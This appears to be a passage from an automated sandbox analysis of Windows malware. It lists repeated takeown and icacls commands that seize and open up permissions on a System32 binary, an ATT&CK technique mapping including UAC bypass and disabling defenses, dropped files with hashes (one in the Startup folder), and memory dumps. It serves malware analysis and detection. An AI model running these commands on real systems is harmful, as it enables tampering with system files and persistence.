  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:3724
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:3708
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3700
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:3748
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3756
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3772
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3780
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3796
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:3804
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3816
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3824
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3836
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3848
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:3856
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3868
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3884
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3892
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3920
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3928
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:3936
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:3948
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3964
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:3984
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3992
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:4000
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4016
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:4024
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4032
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:4044
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:4052
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4068
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:4060
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:4080
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:4088
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Modifies file permissions
  PID:2116
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1608
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:548
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4108
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:4120
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:4140
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:4156
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:4164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\yxNWZGivsK.exe

Filesize
324KB

MD5
f97d51218b970803310ccae33262ad6a

SHA1
ce932afeff06d218f36a645cc2e6cfc328d0f7af

SHA256
47a2c2f824051c28d0f03feda1f511f0697453306f6add1343e0330521f3e8b1

SHA512
2150a9ccaeefcaa171e58a0b85310231f461f4177ba1b1fce9ec1cb0717ababe3f7cc8716e675a6fbfad4c2b20c2d9e5b299e8381aa9c7000b92d1f19873b310

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
f5eb1e31361b7b0cbdc514bc3e3a84dd

SHA1
522df345858e40045123ee199fdc308be2cf5627

SHA256
fc03a5619313064e595ce9b4947e40995aec97ec6509debbc9d6ea092740b0e3

SHA512
6a8d549c9591cc1294c26a0d4be00dd7bc3c088916e65a71bfc34249a0104573e05f5e04d80c7da7e482b95f6dec765e521d6159b4b6fa2be9f5a52083d85b75

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
59cb9a2276fc27c5dafa46788c80949c

SHA1
3b63e2e2e2e5075c23b57af37f5eb97fd9994003

SHA256
991f51d3f379116c3d8ec4816180d2696bb79934c9cee09f635e0cdcf2bf4569

SHA512
9adcf8904faf7060d5646a6134b5bf9206b0e1737717b6c90800d60af5ccc65d9ea720194d0845368f736190288025ca73536aea37b97c44f5f5af1ce2cab9f6

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
325KB

MD5
0a3e107e49c4b96213e6c0891fd5fb54

SHA1
dec4c9633ce57d55c7beca70f50f036278dcca7b

SHA256
3c8a8e4355a2bba614bd78705d45e97b7fb4f5414138bd72a9d5786a29d1a561

SHA512
b54bfb0bbdfc87bb7ecd5dc5aa5d61d339009e1169989e4ac1ea87aa75852366599e5c7c145e6721c2e7b30ccba1a0ad3a2591bb8f8d03d3b7523de01872e6bf

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
325KB

MD5
26f5c2837083a69f7002228558b7b585

SHA1
ac1508f96830666f583e039b61c9bda49135017a

SHA256
6db0c25ff2c5650b84fafaf2250395ce7e7cc47d629b299790ea627356f79193

SHA512
4375bb6dbe39a2e5e17a86d98bfd0f8ceaa928a5447114cf2f962a2420eaa6b2808212506b65ddd6caed5b7338fa9a44eebb5ce0af85691b92608d134edbadda

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
325KB

MD5
715e5b18079887757c0a53358d6aa0ae

SHA1
6f059d760efa80a0104d3a3ec33bb6053817e4e9

SHA256
8fe6062b9d5819019f6fb4ef95cfb342e45b160e56aec753a7ead37c58eb3463

SHA512
7d76ee896955ef8dee7e38953d039e10f3807fdfe8eb74187de8879f2b38519c77e1e1a35274753949668a3438cb1ca5cc2988347c758f76eb54404eb98d4aba

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
325KB

MD5
f96d46e34ac4781fb58cab7bacb5fca0

SHA1
60a37cf06a436a4e9290e52fc7a10fb23fc325dd

SHA256
b382d1a5e8374039fe76f91ee88af53b5fcf457b3d59f757c9345ab25a0a7808

SHA512
1e9126197cc1e5e19d8fefdbb341d37960f4a4abf9f80a278aeaa8861172a9a904bde9cf8b8233ca887278a536a5e793919cac4ace79c976d87ffe020fc6836a

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
325KB

MD5
8bd3f19b98a6bdf5f48bbd2e8b402e57

SHA1
8394a522dab862d9b7750603ea159ec6fe800ad9

SHA256
48e3160c49ff0cb384238f1e0ceeef6504770f344611bb55b2d1c0ce021a4b6c

SHA512
33f3114937f17b6827a839fd7d463875d878ca3910aadafe6ed124722706929491df52fda19c92bb382490dc4db3301500791d18848f12543daa4e79d3a91bb9

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
325KB

MD5
b014067dddbd3502be7e0f0a8d5a8070

SHA1
ce4a16ba35aa6d111ad81ff69240365d52aab814

SHA256
09c70a7a39e691d83b9684c023ac5cb4dd2589d34c1e6479277895d42a28f62e

SHA512
6f6ca0dac4ac112254e53682de8254302fb10287671ddb8147ce51b47fdfb5c23afd73c81652532e9e1728a537fc7e463d8ea83f3ef1768c4e09c63f3823c0a5

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
b5a48fe1ae4e61a2a52a00edf0bbc0aa

SHA1
78c3e39e7cd2b4462f947abfe6ef29944bf27673

SHA256
6f74220933c08cb0c2d5a2c8016ee4a8ad41f944c97dedff2a75fb86223469d8

SHA512
f2886ac529bd633db899200f842762024f3990d2c64f9b624810cbd3cf8843573d94159ca429daf59a8f3757345511c938f1e641c9128626c56ec7c2cdb11616

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
4b87da857531f1f024ea6a9806d5fca6

SHA1
449452892518ea6e94b433e8555280eddd83c2e8

SHA256
07672378850c54fd500fa1e1989ddededf2643d7a4371e464a02aea930bd52f6

SHA512
c11ac17e6e13b15e5e4584e6b97ca72e628990977faa95515909905d1b9b2ed479e3b6e55fa539af412dbaca9d6378bd7a68ca609261cf87329d2555f4ceb5fa

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
11add811a873329e78f7ae3267057076

SHA1
bb539e0030da34bda52ccf0ead90edcb80a586fc

SHA256
aa0fc27c293ea4641acbc9a9dbe38ee4174604ad55fceba39cf4cf93783e9605

SHA512
9bed004fd5948fceff12055059b1559957825a6e6529e1739818bb2284b9134824c3725b681f092a19da829063ee7ae9cf9cafd2b2eaa020262d1de7d76376b1

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
391ced9489ee11d24129cd820bc39891

SHA1
a3bdadcf2f76168a3ff5c09b72445ca3196dcbbe

SHA256
11c7e29a9a9cbb24658457844f48bd5181f84b63324e135b5fa0ca089f467fbb

SHA512
5f98950a4e4d734ff673fcbc96a1e7021615a0938cf2d0d44e534bce21db420020adb29337692e8a700fe45a486fb51fb0f4477dbd09e4e705f33a9a3fd8ad15

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
0ed766155e5accf8752d1773fb84a568

SHA1
60656accf345ff444aa073116c94ce49c3bf78a9

SHA256
7358ec806e34a7779478da0be1a13bbe56237680ef10544ecee5c917fef745f5

SHA512
35ed9ffb328951910debddf3b594ec39e6f57f1f8fce307120c44ec01275ee767ce6f3687092527273d241bf5c45b602f58aa26d80e4a48438be8347a4837314

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
a60d356d8c3846f30d379713d360249e

SHA1
d18cc33d866951091cd42e65f3831d525f2ff0a7

SHA256
0f4fa1a6f89c020aecfb458265ac8ce2818c0a4d8c5b02f1f9af8797eab3d8b4

SHA512
9d4ad7c9f7e8af1094f015bfe7b37bf7e00de8c1b72ec03aedd4649cdc9e78fc8648313cb332f89d450a14518ae399072632109e8061f0927c50eb7ac67f0867

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
2ed2148c78637513319a4a7d65110e61

SHA1
452988257c4288a1c058b3da509b959434056195

SHA256
32a99528ec16cee40bc793a9a523de27221c5000be6463d8139653fb50fa4fa2

SHA512
b85db11670a7183853098d595b53b8291e7a4f5cd454c49f138f19fe173d16e6e5c554b3df0d084bcca0d946248b4ff91938993183401683e62445a87970412a

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
d1e25abaded5f162743bc620de52c4a1

SHA1
013ea9f361bb7d6a8b00fde1d830c294d61a01ff

SHA256
580dcfdc2d6cc7239e3cbf9d87b9615fe22a64846bcce34f1434ab9685385baa

SHA512
3dfacf865ee599e06f1c0ca9c6857fdbc04c2ac15f3bb87685f0e1144ae8d46337f16cbbf7ffae47238f1c72a43105159a661d424edd020fb795ebbb4eb9041b

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
d1e25abaded5f162743bc620de52c4a1

SHA1
013ea9f361bb7d6a8b00fde1d830c294d61a01ff

SHA256
580dcfdc2d6cc7239e3cbf9d87b9615fe22a64846bcce34f1434ab9685385baa

SHA512
3dfacf865ee599e06f1c0ca9c6857fdbc04c2ac15f3bb87685f0e1144ae8d46337f16cbbf7ffae47238f1c72a43105159a661d424edd020fb795ebbb4eb9041b

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
91830f8e6220af3ce6c5247ba259a8cc

SHA1
7c2bdcdbdde78a540267b41c262c02e9d40ce9f3

SHA256
88d02e3bea65519427de96c795eab1b40d35095389078dcdbe44205150fdb77e

SHA512
15801c41beb2074ddb6a693e5725bb03138652ff609c795cc48bca0f59f0aeee138825b00591b20d6314a63aee979a436478e6fb2f01575a6f28f37f65dd4c78

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
cc96264158387902473a30b342a3fabb

SHA1
13e9a50f2c2650bc435c383b668577ec1b0f79c5

SHA256
3eaebd4019b1f8ecfafa9f028c7237b7e384f855358f0826249f9aec80dce118

SHA512
8a2316448f2e0faaea8420c554bfb1cddc6398eba159ec45001b44331be76745920fb28a291e79e2340753a3a8a28e7cc754e18b42b869713647894ffd4c3efd

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
d45e692786ee14dfbd957b74d58d8484

SHA1
a866fc751e83ce20fcdb2205b5a4290833a645d6

SHA256
8484ec7d6fc90e55d6b1309d31dfc20202a15aba25cece8bfe74bf420ca474e4

SHA512
2d56c1f683b0965689da0ca4585a5b02c9631bb1551c68b00bf933873ee3244a5787ba5f72bafa71df2482ab4d713881c0284de5acd9bbd945582cce18daecb3

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
d45e692786ee14dfbd957b74d58d8484

SHA1
a866fc751e83ce20fcdb2205b5a4290833a645d6

SHA256
8484ec7d6fc90e55d6b1309d31dfc20202a15aba25cece8bfe74bf420ca474e4

SHA512
2d56c1f683b0965689da0ca4585a5b02c9631bb1551c68b00bf933873ee3244a5787ba5f72bafa71df2482ab4d713881c0284de5acd9bbd945582cce18daecb3

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
86d2a0f21980fa7c6ef3f354c5b619c6

SHA1
7bb03e0d240cf251bfb125bf708ed050662f993e

SHA256
cd16932b5f2d5ff60fc9531e6b51ce6c2b50232ee24cd5d0df79a48c804ca957

SHA512
9824f50752d84a92037cc84af2dc949a5c945931ff440d9a164be271db241d0adfb635ff03c96a69f7c74f595c0e33e927c6095e7b2317c88d4e49e64ea0ec0c

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
e99282207252e47c52f08a08fc22528d

SHA1
826dd88c20a66191c869a1076359efa30752f82d

SHA256
9ea9d589faccd46f515d6a685c3c8e643cc6c01e110a88b93770350939c51f81

SHA512
dfe061b28042445c18363f17bf0a9a6961a92056bea9b039c9fced43cc4abdfcdedf5a0397ac1dfc0ba12d054239d6e4cbeffe7fd7ac956f501441e3e34d4772

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
2133375ae5893dd42439d90e8e3dd9a6

SHA1
e2b31d7d0b838740f069f78eaeba729e14353f13

SHA256
29a06c5afe73adda7d37e6587b1448ef24ccf276c0f7724af518f29619a4006e

SHA512
00df1bf0c31a82180609a2c1e5e69fbb265698bc62c1f7925a045067499b5592e11c8f4258ea0dfdd394e329ea616144b6fcd16022d153c637ae7e3762386cba

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
2133375ae5893dd42439d90e8e3dd9a6

SHA1
e2b31d7d0b838740f069f78eaeba729e14353f13

SHA256
29a06c5afe73adda7d37e6587b1448ef24ccf276c0f7724af518f29619a4006e

SHA512
00df1bf0c31a82180609a2c1e5e69fbb265698bc62c1f7925a045067499b5592e11c8f4258ea0dfdd394e329ea616144b6fcd16022d153c637ae7e3762386cba

Download Submit
C:\Windows\System32\xpsrchvw.exe

Filesize
324KB

MD5
e2f832f1009e238c4dbd1f8598856095

SHA1
f2c2c33575cc05a7c8bddea89b881bded16d3bf4

SHA256
35c4ad9b8e639b864215f16c6b1abbbd819e8b32f44c182e3e0644443c81cfe6

SHA512
9d5a942c715a85b4b001989ad103af2dcfe885fc3736458118205548fcefeb209bde8a37abe85311b950cb1a955670bb9346653233ed139045b8af1f8a2845c0

Download Submit
memory/1712-0-0x0000000000D00000-0x0000000000D28000-memory.dmp

Filesize
160KB

Download
memory/1712-777-0x000000001B110000-0x000000001B190000-memory.dmp

Filesize
512KB

Download
memory/1712-760-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/1712-2-0x000000001B110000-0x000000001B190000-memory.dmp

Filesize
512KB

Download
memory/1712-1-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/1712-8480-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download